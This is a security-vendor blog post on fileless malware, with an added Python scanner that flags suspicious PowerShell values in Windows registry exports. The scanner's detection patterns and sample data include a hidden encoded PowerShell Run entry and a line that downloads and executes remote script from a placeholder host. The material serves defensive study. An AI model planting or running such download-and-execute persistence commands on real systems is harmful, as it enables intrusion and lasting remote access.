Fileless Malware

Memory Forensics Comes into the Light

David Biser

March 02, 2017 - Posted by David Biser to Threat Intelligence


Recently, fileless malware has shown up in numerous LinkedIn articles, blog posts and research papers. It’s being discussed as the “new” threat to watch out for. I agree that this is an important topic, but I do not agree that it is a new threat. Rather, it has been a threat long ignored and is now being rapidly exploited by attackers.

To give some background: fileless malware resides only in memory, not in a file on disk. The attack under discussion uses Meterpreter code resident in the physical memory of a domain controller. Along with the presence of Meterpreter, analysts discovered PowerShell scripts stored in the Windows Registry. For those who are unaware, Meterpreter is a payload from the Metasploit framework, a free hacking tool commonly used by both penetration testers and criminal hackers. Once the attackers have successfully installed Meterpreter, they use various scripts to install a malicious service on the targeted host. After installing the malicious service, the next step is to set up tunnels that allow remote hosts to reach the infected host, providing the attackers with easy and continuous access.
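As an added defender-side example (not code from the original post), the following Python scan walks a constructed registry export and flags PowerShell persistence values that carry the hallmarks just described (hidden window, no profile, execution-policy bypass, encoded command, download-and-eval), decoding any -EncodedCommand blob so an analyst can read the script text. The registry paths, value names and script are constructed samples, not indicators from the post.

```python
import base64
import re

# Indicators commonly seen in PowerShell one-liners used for fileless
# persistence; each pattern is matched case-insensitively against the value data.
INDICATORS = {
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "no_profile": r"-no(p|profile)\b",
    "bypass_policy": r"-e(p|xecutionpolicy)\s+bypass",
    "encoded_command": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
    "download_and_eval": r"(IEX|Invoke-Expression|DownloadString|FromBase64String)",
}
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')  # one "name"="data" line of a .reg export

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if undecodable."""
    try:
        return base64.b64decode(blob).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_registry_export(text):
    """Return one finding per registry value that invokes powershell with indicators."""
    findings, current_key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]          # new key header
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name = m.group(1)
        data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")  # undo .reg escaping
        if "powershell" not in data.lower():
            continue
        hits = [k for k, pat in INDICATORS.items() if re.search(pat, data, re.I)]
        if not hits:
            continue
        enc = ENC_RE.search(data)
        findings.append({"key": current_key, "value": name, "indicators": hits,
                         "decoded": decode_encoded_command(enc.group(1)) if enc else None})
    return findings

# Constructed sample export: a benign Run entry, an encoded PowerShell Run entry,
# and a service ImagePath that downloads and evaluates remote script text.
SCRIPT = "IEX (Get-ItemProperty HKLM:\\SOFTWARE\\Demo).Payload"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16le")).decode()
SAMPLE_REG = (
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n"
    '"OneDrive"="C:\\\\Users\\\\alice\\\\OneDrive.exe /background"\n'
    f'"Updater"="powershell.exe -nop -w hidden -enc {ENCODED}"\n'
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\svchelper]\n"
    '"ImagePath"="cmd.exe /c powershell -NoProfile -ep bypass -c \\"IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')\\""\n'
)
```

Run the scan over an export taken with `reg export` from a suspect host; every finding names the key and value to pull for the timeline and the decoded script for triage.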

I do not want any readers to think that this is not a threat; it is. It is a growing threat, but not a new one. Memory analysis has been discussed for quite some time among incident response practitioners. For example, you can learn much about memory analysis from the Volatility Foundation. SANS has also incorporated memory analysis into many of its forensic training courses, and here at NTT Security we’ve written several blogs on the topic.

Although this topic isn’t new, there are several vitally important lessons that we can learn from an old threat newly exploited by attackers.

  1. Long-standing hacker tools and techniques: Those involved in incident response must be well versed in all aspects of hacking methodology. This attack doesn’t use new techniques or tools but rather old standbys. Those who are responsible for defending networks must be aware of these hacker tools, and able to identify their artifacts during an incident response event.
  2. Security staff training: Corporate security departments must provide continuous training to their security staff. The use of PowerShell for attacking networks was discussed at last year’s DefCon conference. You can see an example of this technique in Rich Kelley’s DefCon presentation, “Harness: Powershell Weaponization Made Easy (or at least easier).” Your security staff should be budgeted for annual training that is pertinent to securing your network.
  3. Open communication channels: Executive staff should routinely be made aware of current threats that are applicable to your environment. Hackers routinely target different entities with a variety of attacks. Your security staff should be following current threats and response techniques, and be able to describe their defense mechanisms to executives.
  4. Vetting third party incident responders: If you are going to engage a third party for incident response, you should be asking them about issues such as memory forensics and their ability to conduct such examinations. NTT Security provides just such a service and can help you to train your staff and respond to such threats as they develop. The NTT Security Critical Incident Response Team (CIR) and Security Engineering Research Team (SERT) utilize the most current forensic techniques and response capabilities available. For an example, refer to this blog post describing memory analysis. NTT Security resources can be a great aid to your security program.

Final Thoughts

First, even though fileless malware isn’t new, it is a threat and must be dealt with by anyone involved in defending networks. Your security staff’s skill must be greater than the attacker’s or they will find a way in.

Second, provide your security staff with the most up-to-date training available. Send them to DefCon or Black Hat. Let them learn from those who are heavily involved in attacking networks. DefCon provides the best look into hacker methodology. Take care, though, because those attending DefCon have been victims of attacks too.

Third, take your network security seriously. Nation-state attackers, criminal enterprise hackers and others are all seeking entry to your network. They do not rest and neither should your security. Their budget and time allotted to attacking you is endless. Ensuring that your security is appropriately budgeted can help you to battle the consistent attacks.

Fourth, engage with NTT Security for a Compromise Assessment of your network. If you’d like your network secure from threats such as fileless malware, our Critical Incident Response Team can conduct an assessment of your network, searching for threats such as this and helping you secure your network.

Don’t be a victim. Invest in your security program and defend your network as thoroughly as the attackers who are trying to get in!

References:

https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/DEFCON-23-Rich-Kelley-Harness-Powershell-Weaponization-Made-Easy.pdf

https://www.solutionary.com/resource-center/blog/tags/memory-analysis_1/

https://www.solutionary.com/resource-center/blog/2012/12/hunting-malware-with-memory-analysis/

https://www.solutionary.com/resource-center/blog/2015/07/more-memory-fun/

https://www.nttsecurity.com/en/who-we-are/threat-intelligence/sert

https://www.nttsecurity.com/en/what-we-do/incident-response-and-forensics

http://www.blackhat.com/

https://www.defcon.org/
